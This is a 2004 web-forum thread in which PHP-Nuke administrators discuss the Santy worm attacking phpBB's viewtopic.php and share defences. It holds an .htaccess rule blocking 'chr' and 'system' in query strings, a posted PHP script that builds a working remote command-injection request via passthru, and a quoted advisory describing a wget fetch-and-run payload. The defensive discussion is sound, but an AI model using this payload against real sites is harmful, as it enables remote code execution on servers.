Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
blith
Client


Joined: Jul 18, 2003
Posts: 977

PostPosted: Wed Dec 22, 2004 8:14 am Reply with quote

Thanks...
 
View user's profile Send private message Visit poster's website
sixonetonoffun
Spouse Contemplates Divorce


Joined: Jan 02, 2003
Posts: 2496

PostPosted: Wed Dec 22, 2004 9:36 am Reply with quote

phpBB boards running version 2.0.11 aren't vulnerable. Also google filtered the search string already so it shouldn't be "in the wild" anymore.

_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 
View user's profile Send private message
blith
PostPosted: Wed Dec 22, 2004 9:45 am Reply with quote

Thank you. I am so paranoid... who's that?
 
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Wed Dec 22, 2004 10:17 am Reply with quote

somebody called ?
 
View user's profile Send private message
sixonetonoffun
PostPosted: Wed Dec 22, 2004 10:50 am Reply with quote

Also if I understand it the correctly () chars are used in the request and they would be trapped even on a default nuke install.
 
BohrMe
Hangin' Around


Joined: May 01, 2004
Posts: 28
Location: Fall River, MA

PostPosted: Wed Dec 22, 2004 11:26 am Reply with quote

I'm running a heavily modified version of 6.9 and I really don't want to upgrade to a 7.x release in order to protect against this worm. I don't which would be worse, cleaning up after the worm or changing my codebase. And I've already cleaned up one phpBB site that I help maintain!

_________________
BohrMe
eSnider.net 
View user's profile Send private message Visit poster's website
sixonetonoffun
PostPosted: Wed Dec 22, 2004 11:39 am Reply with quote

Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php
 
BohrMe
PostPosted: Wed Dec 22, 2004 11:46 am Reply with quote

No, I don't use Nuke-Sentinel but I have taken some preliminary actions to help prevent the exploit... Other than a .htaccess modification, of course.
 
blith
PostPosted: Wed Dec 22, 2004 11:46 am Reply with quote

sixonetonoffun wrote:
Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php


What could we put into the string blocker?
 
manunkind
Client


Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

PostPosted: Thu Dec 23, 2004 7:54 am Reply with quote

Is it just in viewtopic.php? I ask this because I upgraded a few weeks ago to version 2.0.11 and I looked when I saw that posting and that file still had the old code in it. I replaced the code ASAP but was curious about it because people are saying that version 2.0.11 is already patched.
 
View user's profile Send private message Visit poster's website
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Thu Dec 23, 2004 8:00 am Reply with quote

Maybe its not enough to fix viewtopic.php ?
Today the results for search in goggle.de
"This site is defaced" 343.000 (für) this site is defaced NeverEverNoSanity WebWorm generation 15
 
View user's profile Send private message
beetraham
Regular
Regular


Joined: Dec 13, 2003
Posts: 94
Location: Finland (EU)

PostPosted: Thu Dec 23, 2004 8:50 am Reply with quote

As an additional security measure, please find an example of a *.htaccess* file based security block in the next (to be inserted into $NUKEROOT .htaccess file - for those being influenced by the presence of htaccess);

Code:


Options +SymlinksIfOwnerMatch
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^(.*) /


As a result of the above block, the parts of the commands being detected to be used in the worm's attack are filtered off prior to execution.

[please note: this may not be a bulletproof method for you - listed additional measures based on received recommendations from trusted ISP. It seems to be quite generally suspected, that this worm (or better, it's variants) will also use other medias than merely phpBB in the future to perform these sorts of attacks.]

-beetraham

_________________
- Let there be no windows at your home -

Last edited by beetraham on Thu Dec 23, 2004 10:34 am; edited 2 times in total 
View user's profile Send private message
BohrMe
PostPosted: Thu Dec 23, 2004 8:54 am Reply with quote

How did you get so many hits for that search? When I go to google.de and search for the phrase "This site is defaced" I only get around 3,590. Yesterday that number was only 1,520 on google.com.
 
Susann
PostPosted: Thu Dec 23, 2004 10:40 am Reply with quote

Only registered users can see links on this board! Get registered or login!

or you try: allinurl:viewtopic.php
 
BohrMe
PostPosted: Thu Dec 23, 2004 10:47 am Reply with quote

You should place quotes around your search string or just search for NeverEverNoSanity because you are getting a lot of false hits that have nothing to do with the Sanity worm.
 
BohrMe
PostPosted: Thu Dec 23, 2004 10:49 am Reply with quote

Oh yeah, the allinurl:viewtopic.php produces a 403. Google shut that search down because of Sanity.
 
brine
New Member
New Member


Joined: Jan 28, 2004
Posts: 10

PostPosted: Thu Dec 23, 2004 10:22 pm Reply with quote

I guess, sites that did not upgrade are safe far now...

Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
BohrMe
PostPosted: Thu Dec 23, 2004 10:59 pm Reply with quote

Hopefully, it's a lesson well learned by Google and all.
 
brine
PostPosted: Fri Dec 24, 2004 7:06 am Reply with quote

BohrMe wrote:
Hopefully, it's a lesson well learned by Google and all.


Somehow, I do think it will be.
 
sixonetonoffun
PostPosted: Fri Dec 24, 2004 8:36 am Reply with quote

One of the regulars is seeing a variant that is intended to exploit the phpnuke port at a very disturbing rate approx 25 per hour. Sentinel trapped it but that indicates its getting passed Apache. I tested it on a couple of sites of my own and it throws a 403.

Best thing is to make sure your viewtopic.php is patched regardless of googles response.
 
BohrMe
PostPosted: Fri Dec 24, 2004 8:42 am Reply with quote

brine wrote:
Somehow, I do think it will be.


I've met some of the Google guys (namely Rob Pike) and they're sharper than you think.
 
VinDSL
Life Cycles Becoming CPU Cycles


Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

PostPosted: Fri Dec 24, 2004 10:42 am Reply with quote

You can use this script to see if your phpBB is vulnerable...
Code:
<?php

$p='ls -al';
$highlight='passthru($HTTP_GET_VARS[p])';

print "?t=%37&p=";

for ($i=0; $i<strlen($p); ++$i) {
 print '%' . bin2hex(substr($p,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
 print '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

Running this script on your web site should generate a request parameter.

All you need to do is copy 'n' paste the result onto:
Code:
http://your-site.com/index.php?name=Forums&file=viewtopic



Example:
Code:
http://your-site.com/index.php?name=Forums&file=viewtopic&?t=%37&p=%6c%73%20...<yada,yada> 



As sixonetonoffun said, Nuke should trap it, even on a default install... Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: Only registered users can see links on this board! Get registered or login! | Only registered users can see links on this board! Get registered or login! ::. 
View user's profile Send private message Visit poster's website ICQ Number
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Fri Dec 24, 2004 3:54 pm Reply with quote

NukeSentinel traps it, but if you want tp stop it at the server level, see my post Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
beetraham
PostPosted: Sat Dec 25, 2004 7:59 pm Reply with quote

Just as a heads-up...

Quote:
[http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0]

To: BugTraq
Subject: New Santy-Worm attacks *all* PHP-skripts
Date: Dec 25 2004 5:12PM
Author: Juergen Schmidt <ju heisec de>
Message-ID: <Pine.LNX.4.58.0412251805110.19888@loki.ct.heise.de>

Hello,

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:
Only registered users can see links on this board! Get registered or login! /tmp;wget Only registered users can see links on this board! Get registered or login!

Often enough this leads to download and execution of code. On success the worm connects to an IRC server, where already more than 700 zombies are waiting for commands.

 
PHrEEkie
Subject Matter Expert


Joined: Feb 23, 2004
Posts: 358

PostPosted: Sat Dec 25, 2004 9:38 pm Reply with quote

Ok, now I understand exactly why I haven't had even one attack across an entire server running multiple Nukes and phpBB standalones. Way back when the Brazilian folks started focusing on Nuke vulns, I banned server-wide the entire continent of South America. I would then imagine that the brazilian Google engine has none of my server's content available.

Just luck, I guess... I've had those foos banned for almost 2 years, and now that this concentrated attack is under way, I haven't had even one hit so far. Wish I was this lucky playing the Lottery! Wink

PHrEEk

_________________
PHP - Breaking your legacy scripts one build at a time. 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©